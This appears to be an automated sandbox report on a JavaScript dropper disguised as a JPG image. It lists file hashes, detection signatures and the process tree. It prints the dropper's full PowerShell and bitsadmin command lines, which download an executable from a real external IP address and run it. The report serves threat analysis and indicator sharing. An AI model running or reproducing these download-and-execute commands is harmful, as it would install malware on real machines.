Analysis
Max time kernel: 118s
Max time network: 118s
Platform: windows7_x64
Resource: win7-20240708-en
Resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
Submitted: 09-08-2024 20:34
Static task: static1

Behavioral task: behavioral1
  Sample: 83756c7a0955e458e90b540989d0d4ed_JaffaCakes118.zip
  Resource: win7-20240708-en

Behavioral task: behavioral2
  Sample: 83756c7a0955e458e90b540989d0d4ed_JaffaCakes118.zip
  Resource: win10v2004-20240802-en

Behavioral task: behavioral3
  Sample: PIC119166.jpg.js
  Resource: win7-20240708-en
General
Target: PIC119166.jpg.js
Size: 650B
MD5: a7ab035cbabbaa850b95e1eb8c877789
SHA1: 1175c71d4e70591c3816292fd9107486a7fb3bbe
SHA256: a84be445b2a8be5ed37e7d23816293f15ba5acec72fde6e77d59db4832eace48
SHA512: 7189b836a35309cc29acadfb3ed9bb915db1adb47780b70c1ec44ab308d46eaebdc1ab1fae7a460d437f47fef781c0a4d7d9c4e025f7de6e0952b21d792c1854
Malware Config
Extracted: http://217.8.117.63/tspam.exe
Signatures

Blocklisted process makes network request (1 IoC)
  Processes:
    flow  pid   process
    6     2948  powershell.exe

Download via BitsAdmin (1 TTP, 1 IoC)

Command and Scripting Interpreter: JavaScript (1 TTP)

Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes:
    pid   process
    2948  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  2948  powershell.exe

Suspicious use of WriteProcessMemory (12 IoCs)
  Processes:
    description                        pid   process         target process
    PID 2924 wrote to memory of 2672   2924  wscript.exe     cmd.exe
    PID 2924 wrote to memory of 2672   2924  wscript.exe     cmd.exe
    PID 2924 wrote to memory of 2672   2924  wscript.exe     cmd.exe
    PID 2924 wrote to memory of 2760   2924  wscript.exe     cmd.exe
    PID 2924 wrote to memory of 2760   2924  wscript.exe     cmd.exe
    PID 2924 wrote to memory of 2760   2924  wscript.exe     cmd.exe
    PID 2672 wrote to memory of 2948   2672  cmd.exe         powershell.exe
    PID 2672 wrote to memory of 2948   2672  cmd.exe         powershell.exe
    PID 2672 wrote to memory of 2948   2672  cmd.exe         powershell.exe
    PID 2760 wrote to memory of 2648   2760  cmd.exe         bitsadmin.exe
    PID 2760 wrote to memory of 2648   2760  cmd.exe         bitsadmin.exe
    PID 2760 wrote to memory of 2648   2760  cmd.exe         bitsadmin.exe
Processes

C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC119166.jpg.js
  PID: 2924
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'
    PID: 2672
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'
      PID: 2948
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe&start C:\Users\Admin\AppData\Local\Temp\558392.exe
    PID: 2760
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\bitsadmin.exe
      Command line: bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe
      PID: 2648
      - Download via BitsAdmin